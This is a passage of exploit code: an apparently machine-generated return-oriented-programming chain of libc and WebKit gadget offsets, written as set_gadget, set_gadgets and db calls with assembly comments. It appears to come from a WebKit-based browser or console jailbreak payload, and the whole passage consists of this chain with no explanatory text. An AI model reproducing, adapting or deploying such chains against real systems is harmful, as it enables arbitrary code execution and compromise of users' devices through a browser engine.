libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255640, //L4712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4712: db([0, 0]); // 0x0 //L4684: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255768, //L4715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255784, //L4716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255752, //L4714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4714: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4715: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4716: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255896, //L4718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255944, //L4721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255912, //L4719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4719: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4720: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4721: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+256056, //L4722+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+256048, //L4722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4722: db([0, 0]); // 0x0 set_gadgets([ ropchain+256072, //L4722+24 ropchain+258080, //L4717 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256112, //L4723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4724: db([98, 0]); // 0x62 set_gadget(libc_base+144605,); //pop rdi //L4725: db([98, 0]); // 0x62 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256304, //L4729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256272, //L4727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256288, 
//L4728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4726: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4729: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+256360, //L4731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4731: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+256488, //L4733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+256504, //L4734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256472, //L4732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4732: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4734: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+256600, //L4736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+256584, //L4735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4736: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+256680, //L4737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4737: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop 
rsi //L4739: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+256800, //L4742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256784, //L4740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4740: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+256944, //L4745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256912, //L4743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256928, //L4744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4743: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4744: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4745: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257016, //L4747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4747: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257072, //L4748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4748: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257152, //L4750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4750: db([0, 0]); 
// 0x0 set_gadget(libc_base+764760,); //pop rsi //L4752: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257272, //L4755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257256, //L4753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4755: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257416, //L4758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257384, //L4756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+257400, //L4757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4756: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4757: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4758: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257504, //L4760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4759: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4760: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257560, //L4761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4763: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+257640, //L4765 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4765: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257744, //L4766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+257760, //L4767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4766: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4767: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+257848, //L4769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257904, //L4770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257976, //L4773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4773: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258032, //L4774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4774: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4717: //L4659: //L4505: libc_base+764760, //pop rsi ropchain+258120, //L4776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4776: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4778: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+258240, //L4781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258224, //L4779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4779: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4781: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258384, //L4784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258352, //L4782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258368, //L4783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4783: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4784: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258480, //L4786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4785: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4786: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4787: db([32, 0]); // 0x20 set_gadgets([ 
libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+258584, //L4788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258600, //L4789 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4788: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4789: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+258776, //L4791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258792, //L4792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258760, //L4790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4791: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4792: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+258904, //L4794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258952, //L4797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+258920, //L4795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4795: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4796: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4797: db([0, 0]); // 
0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+259064, //L4798+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+259056, //L4798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4798: db([0, 0]); // 0x0 set_gadgets([ ropchain+259080, //L4798+24 ropchain+261088, //L4793 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259120, //L4799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4799: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4800: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4801: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259312, //L4805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259280, //L4803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259296, //L4804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4802: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4803: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4805: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+259368, //L4807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4807: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+259496, //L4809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
//pop rsi ropchain+259512, //L4810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259480, //L4808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4808: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4809: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4810: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259608, //L4812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259592, //L4811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4811: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4812: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+259688, //L4813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4813: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4815: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+259808, //L4818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259792, //L4816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4816: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4818: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+259952, //L4821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259920, //L4819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259936, //L4820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4820: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4821: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260024, //L4823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4823: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260080, //L4824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260160, //L4826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4826: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4828: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260280, //L4831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260264, //L4829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4829: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260424, //L4834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260392, //L4832 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+260408, //L4833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4834: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260512, //L4836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4835: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4836: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260568, //L4837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4837: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4839: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+260648, //L4841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4841: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260752, //L4842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+260768, //L4843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4842: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4843: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+260856, //L4845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4845: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260912, //L4846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4846: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260984, //L4849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4849: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261040, //L4850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4850: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4793: //L4111: libc_base+764760, //pop rsi ropchain+261128, //L4852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4852: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4854: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+261248, //L4857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261232, //L4855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L4855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4857: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261392, //L4860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261360, //L4858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261376, //L4859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4859: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261488, //L4862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4861: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4863: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+261592, //L4864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261608, //L4865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4865: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+261784, 
